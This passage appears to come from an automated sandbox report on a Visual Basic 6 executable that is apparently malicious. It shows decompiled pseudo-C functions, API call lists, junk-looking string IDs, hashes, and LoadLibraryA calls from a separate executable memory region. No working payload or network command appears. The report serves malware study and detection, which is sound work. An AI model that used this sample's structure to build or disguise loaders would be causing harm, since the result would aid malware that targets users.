					_push(_v136);
					L004016B2();
					_v144 = _t56;
				}
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v36);
				_t59 =  &_v52;
				_push(_t59); // executed
				L004015E6(); // executed
				_push(_t59);
				L004015EC();
				_push(_t59);
				_push( &_v24);
				L00401610();
				L004016AC();
				L0040167C();
				_v76 = L"forswat";
				_v84 = 8;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Caption");
				_push(_v24);
				L004015E0();
				_v76 = 0x6ee8;
				_v84 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v24);
				L004015E0();
				_v76 = 0x4d4e;
				_v84 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v24);
				L004015E0();
				_v76 = _v76 | 0xffffffff;
				_v84 = 0xb;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v24);
				L004015E0();
				_v76 = _v76 & 0x00000000;
				_v84 = 0x8008;
				_push(0);
				_push(L"Caption");
				_push(_v24);
				_t65 =  &_v52;
				_push(_t65);
				L004015E6();
				_push(_t65);
				_t66 =  &_v84;
				_push(_t66);
				L0040165E();
				_v136 = _t66;
				L0040167C();
				asm("wait");
				_push(0x4123ea);
				L004016AC();
				return _t66;
			}




















                                  0x004121fd
                                  0x00412207
                                  0x0041220f
                                  0x00412212
                                  0x00412219
                                  0x00412220
                                  0x00412227
                                  0x0041222e
                                  0x00412241
                                  0x00412247
                                  0x00412249
                                  0x00412256
                                  0x00412278
                                  0x00412258
                                  0x00412258
                                  0x0041225d
                                  0x00412262
                                  0x00412265
                                  0x0041226b
                                  0x00412270
                                  0x00412270
                                  0x0041227f
                                  0x00412282
                                  0x0041228c
                                  0x0041228d
                                  0x0041228e
                                  0x0041228f
                                  0x00412290
                                  0x00412293
                                  0x0041229d
                                  0x0041229e
                                  0x0041229f
                                  0x004122a0
                                  0x004122a1
                                  0x004122a3
                                  0x004122a8
                                  0x004122ab
                                  0x004122ae
                                  0x004122af
                                  0x004122b7
                                  0x004122b8
                                  0x004122bd
                                  0x004122c1
                                  0x004122c2
                                  0x004122ca
                                  0x004122d2
                                  0x004122d7
                                  0x004122de
                                  0x004122e5
                                  0x004122e8
                                  0x004122f2
                                  0x004122f3
                                  0x004122f4
                                  0x004122f5
                                  0x004122f6
                                  0x004122fb
                                  0x004122fe
                                  0x00412303
                                  0x0041230a
                                  0x00412311
                                  0x00412314
                                  0x0041231e
                                  0x0041231f
                                  0x00412320
                                  0x00412321
                                  0x00412322
                                  0x00412327
                                  0x0041232a
                                  0x0041232f
                                  0x00412336
                                  0x0041233d
                                  0x00412340
                                  0x0041234a
                                  0x0041234b
                                  0x0041234c
                                  0x0041234d
                                  0x0041234e
                                  0x00412353
                                  0x00412356
                                  0x0041235b
                                  0x0041235f
                                  0x00412366
                                  0x00412369
                                  0x00412373
                                  0x00412374
                                  0x00412375
                                  0x00412376
                                  0x00412377
                                  0x0041237c
                                  0x0041237f
                                  0x00412384
                                  0x00412388
                                  0x0041238f
                                  0x00412391
                                  0x00412396
                                  0x00412399
                                  0x0041239c
                                  0x0041239d
                                  0x004123a5
                                  0x004123a6
                                  0x004123a9
                                  0x004123aa
                                  0x004123af
                                  0x004123b9
                                  0x004123be
                                  0x004123bf
                                  0x004123e4
                                  0x004123e9

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00412207
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000218), ref: 0041226B
                                  • __vbaChkstk.MSVBVM60 ref: 00412282
                                  • __vbaChkstk.MSVBVM60 ref: 00412293
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 004122AF
                                  • __vbaObjVar.MSVBVM60(00000000), ref: 004122B8
                                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 004122C2
                                  • __vbaFreeObj.MSVBVM60(?,00000000,00000000), ref: 004122CA
                                  • __vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 004122D2
                                  • __vbaChkstk.MSVBVM60 ref: 004122E8
                                  • __vbaLateMemSt.MSVBVM60(?,Caption), ref: 004122FE
                                  • __vbaChkstk.MSVBVM60(?,Caption), ref: 00412314
                                  • __vbaLateMemSt.MSVBVM60(?,Left,?,Caption), ref: 0041232A
                                  • __vbaChkstk.MSVBVM60(?,Left,?,Caption), ref: 00412340
                                  • __vbaLateMemSt.MSVBVM60(?,Top,?,Left,?,Caption), ref: 00412356
                                  • __vbaChkstk.MSVBVM60(?,Top,?,Left,?,Caption), ref: 00412369
                                  • __vbaLateMemSt.MSVBVM60(?,Visible,?,Top,?,Left,?,Caption), ref: 0041237F
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Caption,00000000,?,Visible,?,Top,?,Left,?,Caption), ref: 0041239D
                                  • __vbaVarTstEq.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 004123AA
                                  • __vbaFreeVar.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 004123B9
                                  • __vbaFreeObj.MSVBVM60(004123EA,?,00000000,?,?,00000000,00000000), ref: 004123E4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Chkstk$Late$Free$Call$AddrefCheckHresult
                                  • String ID: Add$Caption$Fieldfight$Left$NM$Top$VB.CommandButton$Visible$forswat
                                  • API String ID: 4274921479-2698499078
                                  • Opcode ID: d626122fa492a1eed627af50a289a98a35d618e0ccdc9f30ef8ca844470a707e
                                  • Instruction ID: be67f1f065c697d9d4ad682d834c6aa2ea5caf3f3e2ac79a38894e9a13e0e38b
                                  • Opcode Fuzzy Hash: d626122fa492a1eed627af50a289a98a35d618e0ccdc9f30ef8ca844470a707e
                                  • Instruction Fuzzy Hash: CC514B71950618ABDF11EFA0CD4ABCEB7B6BF05704F10042AB500BB1E2CBFA69459B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412405, Relevance: 45.6, APIs: 20, Strings: 6, Instructions: 145COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 36%
                                  			E00412405(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v48;
				signed int _v72;
				char _v80;
				char* _v104;
				intOrPtr _v112;
				signed int _v132;
				signed int _v144;
				signed int _t60;
				char* _t63;
				char* _t68;
				signed int _t69;
				signed int _t70;
				void* _t88;
				void* _t90;
				intOrPtr _t91;

				_t91 = _t90 - 0xc;
				 *[fs:0x0] = _t91;
				L004014F0();
				_v16 = _t91;
				_v12 = 0x4014b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x4014f6, _t88);
				_v72 = L"VB.VscrollBar";
				_v80 = 8;
				_v104 = L"Subvitalized";
				_v112 = 8;
				_t60 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v32);
				asm("fclex");
				_v132 = _t60;
				if(_v132 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x40256c);
					_push(_a4);
					_push(_v132);
					L004016B2();
					_v144 = _t60;
				}
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v32);
				_t63 =  &_v48;
				_push(_t63); // executed
				L004015E6(); // executed
				_push(_t63);
				L004015EC();
				_push(_t63);
				_push( &_v28);
				L00401610();
				L004016AC();
				L0040167C();
				_v72 = 0x5f1c;
				_v80 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v28);
				L004015E0();
				_v72 = 0x2f97;
				_v80 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v28);
				L004015E0();
				_v72 = _v72 | 0xffffffff;
				_v80 = 0xb;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v28);
				L004015E0();
				_v72 = _v72 & 0x00000000;
				_v80 = 0x8002;
				_push(0);
				_push(L"Left");
				_push(_v28);
				_t68 =  &_v48;
				_push(_t68);
				L004015E6();
				_push(_t68);
				_t69 =  &_v80;
				_push(_t69);
				L0040165E();
				_v132 = _t69;
				L0040167C();
				_t70 = _v132;
				if(_t70 != 0) {
					_push(0xc3);
					L0040162E();
				}
				_push(0x4125ef);
				L004016AC();
				return _t70;
			}























                                  0x00412408
                                  0x00412417
                                  0x00412421
                                  0x00412429
                                  0x0041242c
                                  0x00412433
                                  0x00412442
                                  0x00412445
                                  0x0041244c
                                  0x00412453
                                  0x0041245a
                                  0x0041246d
                                  0x00412473
                                  0x00412475
                                  0x0041247c
                                  0x0041249b
                                  0x0041247e
                                  0x0041247e
                                  0x00412483
                                  0x00412488
                                  0x0041248b
                                  0x0041248e
                                  0x00412493
                                  0x00412493
                                  0x004124a2
                                  0x004124a5
                                  0x004124af
                                  0x004124b0
                                  0x004124b1
                                  0x004124b2
                                  0x004124b3
                                  0x004124b6
                                  0x004124c0
                                  0x004124c1
                                  0x004124c2
                                  0x004124c3
                                  0x004124c4
                                  0x004124c6
                                  0x004124cb
                                  0x004124ce
                                  0x004124d1
                                  0x004124d2
                                  0x004124da
                                  0x004124db
                                  0x004124e0
                                  0x004124e4
                                  0x004124e5
                                  0x004124ed
                                  0x004124f5
                                  0x004124fa
                                  0x00412501
                                  0x00412508
                                  0x0041250b
                                  0x00412515
                                  0x00412516
                                  0x00412517
                                  0x00412518
                                  0x00412519
                                  0x0041251e
                                  0x00412521
                                  0x00412526
                                  0x0041252d
                                  0x00412534
                                  0x00412537
                                  0x00412541
                                  0x00412542
                                  0x00412543
                                  0x00412544
                                  0x00412545
                                  0x0041254a
                                  0x0041254d
                                  0x00412552
                                  0x00412556
                                  0x0041255d
                                  0x00412560
                                  0x0041256a
                                  0x0041256b
                                  0x0041256c
                                  0x0041256d
                                  0x0041256e
                                  0x00412573
                                  0x00412576
                                  0x0041257b
                                  0x0041257f
                                  0x00412586
                                  0x00412588
                                  0x0041258d
                                  0x00412590
                                  0x00412593
                                  0x00412594
                                  0x0041259c
                                  0x0041259d
                                  0x004125a0
                                  0x004125a1
                                  0x004125a6
                                  0x004125ad
                                  0x004125b2
                                  0x004125b8
                                  0x004125ba
                                  0x004125bf
                                  0x004125bf
                                  0x004125c4
                                  0x004125e9
                                  0x004125ee

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00412421
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,004014B8,0040256C,00000218), ref: 0041248E
                                  • __vbaChkstk.MSVBVM60 ref: 004124A5
                                  • __vbaChkstk.MSVBVM60 ref: 004124B6
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 004124D2
                                  • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004124DB
                                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004124E5
                                  • __vbaFreeObj.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004124ED
                                  • __vbaFreeVar.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004124F5
                                  • __vbaChkstk.MSVBVM60 ref: 0041250B
                                  • __vbaLateMemSt.MSVBVM60(?,Left), ref: 00412521
                                  • __vbaChkstk.MSVBVM60(?,Left), ref: 00412537
                                  • __vbaLateMemSt.MSVBVM60(?,Top,?,Left), ref: 0041254D
                                  • __vbaChkstk.MSVBVM60(?,Top,?,Left), ref: 00412560
                                  • __vbaLateMemSt.MSVBVM60(?,Visible,?,Top,?,Left), ref: 00412576
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Left,00000000,?,Visible,?,Top,?,Left), ref: 00412594
                                  • __vbaVarTstEq.MSVBVM60(00008002,00000000), ref: 004125A1
                                  • __vbaFreeVar.MSVBVM60(00008002,00000000), ref: 004125AD
                                  • #570.MSVBVM60(000000C3,00008002,00000000), ref: 004125BF
                                  • __vbaFreeObj.MSVBVM60(004125EF,00008002,00000000), ref: 004125E9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Chkstk$Late$Free$Call$#570AddrefCheckHresult
                                  • String ID: Add$Left$Subvitalized$Top$VB.VscrollBar$Visible
                                  • API String ID: 1265526610-1223836639
                                  • Opcode ID: 96523d976d9237f6706cc1916b3b7431b25c8734ecfefd13e75efa752686fca4
                                  • Instruction ID: 8d7b7479a322f7138cd08eb483568e1bd780ad1cecc14c19c96926a102978a37
                                  • Opcode Fuzzy Hash: 96523d976d9237f6706cc1916b3b7431b25c8734ecfefd13e75efa752686fca4
                                  • Instruction Fuzzy Hash: FA517071D00608ABDF11EFA5CD4ABDEBBB5AF04708F10842AF500BB1E1CBBD65469B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004113A2, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E004113A2(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				short _v68;
				signed int _t24;
				char* _t28;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				L004014F0();
				_v16 = _t44;
				_v12 = 0x4013b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4014f6, _t41);
				L004016A6();
				_v56 = 0x80020004;
				_v64 = 0xa;
				_t24 = 0x10;
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Opnaaelige2");
				_push(L"Parra3");
				_push(L"Sangrias8"); // executed
				L004015B0(); // executed
				L0040161C();
				_push(_t24);
				_push(0);
				L00401694();
				asm("sbb eax, eax");
				_v68 =  ~( ~( ~_t24));
				L0040169A();
				_t28 = _v68;
				if(_t28 != 0) {
					_push(0);
					_push(L"skoledagen");
					_t28 =  &_v48;
					_push(_t28);
					L004015AA();
					L0040167C();
				}
				_push(0x411487);
				L0040169A();
				return _t28;
			}

















                                  0x004113a5
                                  0x004113b4
                                  0x004113be
                                  0x004113c6
                                  0x004113c9
                                  0x004113d0
                                  0x004113df
                                  0x004113e8
                                  0x004113ed
                                  0x004113f4
                                  0x004113fd
                                  0x004113fe
                                  0x00411408
                                  0x00411409
                                  0x0041140a
                                  0x0041140b
                                  0x0041140c
                                  0x00411411
                                  0x00411416
                                  0x0041141b
                                  0x00411425
                                  0x0041142a
                                  0x0041142b
                                  0x0041142d
                                  0x00411434
                                  0x0041143a
                                  0x00411441
                                  0x00411446
                                  0x0041144c
                                  0x0041144e
                                  0x00411450
                                  0x00411455
                                  0x00411458
                                  0x00411459
                                  0x00411461
                                  0x00411461
                                  0x00411466
                                  0x00411481
                                  0x00411486

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004113BE
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 004113E8
                                  • __vbaChkstk.MSVBVM60 ref: 004113FE
                                  • #689.MSVBVM60(Sangrias8,Parra3,Opnaaelige2), ref: 0041141B
                                  • __vbaStrMove.MSVBVM60(Sangrias8,Parra3,Opnaaelige2), ref: 00411425
                                  • __vbaStrCmp.MSVBVM60(00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 0041142D
                                  • __vbaFreeStr.MSVBVM60(00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 00411441
                                  • #716.MSVBVM60(?,skoledagen,00000000,00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 00411459
                                  • __vbaFreeVar.MSVBVM60(?,skoledagen,00000000,00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 00411461
                                  • __vbaFreeStr.MSVBVM60(00411487,00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 00411481
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$Chkstk$#689#716CopyMove
                                  • String ID: Opnaaelige2$Parra3$Sangrias8$skoledagen
                                  • API String ID: 3645796391-2988273925
                                  • Opcode ID: e7b2805252f514af1f82907cc5396741cad1631ca2845a8ca7bf1d95c1bc0142
                                  • Instruction ID: 1d10c37873aff324cec167ed6d9643b13950bab6e3f90f64e192711ea7cf798a
                                  • Opcode Fuzzy Hash: e7b2805252f514af1f82907cc5396741cad1631ca2845a8ca7bf1d95c1bc0142
                                  • Instruction Fuzzy Hash: D8113070980209ABCB10EFA5CD46FEE7778AF44B04F54852AF501BB2E1DBBD9905CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041060B, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 102COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E0041060B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				char* _v100;
				intOrPtr _v108;
				intOrPtr _v116;
				char _v124;
				void* _v160;
				signed int _v164;
				signed int _v176;
				short _t58;
				char* _t61;
				char* _t62;
				signed int _t69;
				void* _t79;
				void* _t81;
				intOrPtr _t82;

				_t82 = _t81 - 0xc;
				 *[fs:0x0] = _t82;
				L004014F0();
				_v16 = _t82;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4014f6, _t79);
				_v100 = L"9:9:9";
				_v108 = 8;
				L00401634();
				_push( &_v44);
				_push( &_v60); // executed
				L00401628(); // executed
				_v116 = 9;
				_v124 = 0x8002;
				_push( &_v60);
				_t58 =  &_v124;
				_push(_t58);
				L00401688();
				_v160 = _t58;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L00401676();
				_t61 = _v160;
				if(_t61 != 0) {
					L00401622();
					_t62 =  &_v28;
					L00401652();
					_v160 = _t62;
					_v84 = 0x80020004;
					_v92 = 0xa;
					_v68 = 0x80020004;
					_v76 = 0xa;
					_v52 = 0x80020004;
					_v60 = 0xa;
					_v36 = 0x80020004;
					_v44 = 0xa;
					_t69 =  *((intOrPtr*)( *_v160 + 0x44))(_v160, 0x41fe,  &_v44,  &_v60,  &_v76,  &_v92, _t62, _t61);
					asm("fclex");
					_v164 = _t69;
					if(_v164 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x402bb0);
						_push(_v160);
						_push(_v164);
						L004016B2();
						_v176 = _t69;
					}
					L004016AC();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_t61 =  &_v44;
					_push(_t61);
					_push(4);
					L00401676();
				}
				_push(0x4107ae);
				return _t61;
			}





























                                  0x0041060e
                                  0x0041061d
                                  0x00410629
                                  0x00410631
                                  0x00410634
                                  0x0041063b
                                  0x0041064a
                                  0x0041064d
                                  0x00410654
                                  0x00410661
                                  0x00410669
                                  0x0041066d
                                  0x0041066e
                                  0x00410673
                                  0x0041067a
                                  0x00410684
                                  0x00410685
                                  0x00410688
                                  0x00410689
                                  0x0041068e
                                  0x00410698
                                  0x0041069c
                                  0x0041069d
                                  0x0041069f
                                  0x004106a7
                                  0x004106b0
                                  0x004106b6
                                  0x004106bc
                                  0x004106c0
                                  0x004106c5
                                  0x004106cb
                                  0x004106d2
                                  0x004106d9
                                  0x004106e0
                                  0x004106e7
                                  0x004106ee
                                  0x004106f5
                                  0x004106fc
                                  0x00410726
                                  0x00410729
                                  0x0041072b
                                  0x00410738
                                  0x0041075a
                                  0x0041073a
                                  0x0041073a
                                  0x0041073c
                                  0x00410741
                                  0x00410747
                                  0x0041074d
                                  0x00410752
                                  0x00410752
                                  0x00410764
                                  0x0041076c
                                  0x00410770
                                  0x00410774
                                  0x00410775
                                  0x00410778
                                  0x00410779
                                  0x0041077b
                                  0x00410780
                                  0x00410783
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410629
                                  • __vbaVarDup.MSVBVM60 ref: 00410661
                                  • #547.MSVBVM60(?,?), ref: 0041066E
                                  • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00410689
                                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0041069F
                                  • #685.MSVBVM60(?,?,004014F6), ref: 004106B6
                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,004014F6), ref: 004106C0
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402BB0,00000044), ref: 0041074D
                                  • __vbaFreeObj.MSVBVM60(00000000,?,00402BB0,00000044), ref: 00410764
                                  • __vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A), ref: 0041077B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$List$#547#685CheckChkstkHresult
                                  • String ID: 9:9:9
                                  • API String ID: 3853965478-2761145665
                                  • Opcode ID: 02ec14085617b48e3c925d1332b2cccb0336852c6dee3835f75e1528a51abac3
                                  • Instruction ID: 28aadc1c72cb08139623acc5ab2035c5ad287cc81766946ddea7c829b40bcb44
                                  • Opcode Fuzzy Hash: 02ec14085617b48e3c925d1332b2cccb0336852c6dee3835f75e1528a51abac3
                                  • Instruction Fuzzy Hash: CE4104B1900208EFEB11EF90CC85FDEBBB8BF04304F04456AE105B6291D779A689CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D3EEF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: 0
                                  • API String ID: 1029625771-4108050209
                                  • Opcode ID: 90cfb5faf30fb222f2f0ba4def82dd202cf058ee94270fea3b45b766a9dd3f5c
                                  • Instruction ID: 41a5b1236babba2084ea12b63967a71db6741b60c54dc9fbb1d6249cc718a20f
                                  • Opcode Fuzzy Hash: 90cfb5faf30fb222f2f0ba4def82dd202cf058ee94270fea3b45b766a9dd3f5c
                                  • Instruction Fuzzy Hash: 6F21F674578249EEEF342AE0AC51BFD66275F01311F908516FC875209DDBEA8585CE03
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D406C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: 0
                                  • API String ID: 1029625771-4108050209
                                  • Opcode ID: 00ef156714c12fabd912b22a22f082e2056b1488a228c0d2d156419c57ae51fc
                                  • Instruction ID: 1bd5851bf157ecaffc246519a24a802dcd9291cabd18933f85ef42b754538bfd
                                  • Opcode Fuzzy Hash: 00ef156714c12fabd912b22a22f082e2056b1488a228c0d2d156419c57ae51fc
                                  • Instruction Fuzzy Hash: 68117B7187D2829DDF3126F05895BBCAA2A5F52311FD4C61FD8838108EDBCCC085C913
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D6EA1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: 0
                                  • API String ID: 1029625771-4108050209
                                  • Opcode ID: 9f30d9e5984a97583364890811ed6736cc5330174d65c2ae9fe947b61d9a1ae1
                                  • Instruction ID: 84d013d4dd9a8adec6d2b30248ad6336853864fc9d081ea390f8364291adc35b
                                  • Opcode Fuzzy Hash: 9f30d9e5984a97583364890811ed6736cc5330174d65c2ae9fe947b61d9a1ae1
                                  • Instruction Fuzzy Hash: ACF0C27067D616EDEF3426F46891BFCD12A4B45322FD4862BE853810CCDADCC08AC917
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D6EFF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: 0
                                  • API String ID: 1029625771-4108050209
                                  • Opcode ID: c2531d1483c67f030086ef4bb6d4d66e2dd9394d4cbced43a96c089ad600ba9f
                                  • Instruction ID: 988fa0990f7d53769613303de2acf32739ea2c56b25074d988919b18ea1abdeb
                                  • Opcode Fuzzy Hash: c2531d1483c67f030086ef4bb6d4d66e2dd9394d4cbced43a96c089ad600ba9f
                                  • Instruction Fuzzy Hash: 6FF0F070A79216DDEF3026F468907FCD1224B04322FD4862BE8A3810CCDADCC08ACD07
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004016D8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			_entry_(signed int __eax, signed int __ebx, signed int __ecx, intOrPtr __edi, void* __fp0, char _a1, intOrPtr* _a4, char _a64, char _a83, intOrPtr _a630980672) {
				char _v1;
				signed char* _v8;
				intOrPtr _v28;
				char _v32;
				short _v36;
				long long _v44;
				long long _v52;
				short _v56;
				short _v60;
				short _v64;
				char _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				long long _v88;
				short _v92;
				intOrPtr _v96;
				signed int _v99;
				char _v100;
				short _v104;
				intOrPtr _v108;
				signed int _v111;
				char _v112;
				intOrPtr _v115;
				intOrPtr* _v119;
				long long _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				void* _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				signed int _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				signed int* _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
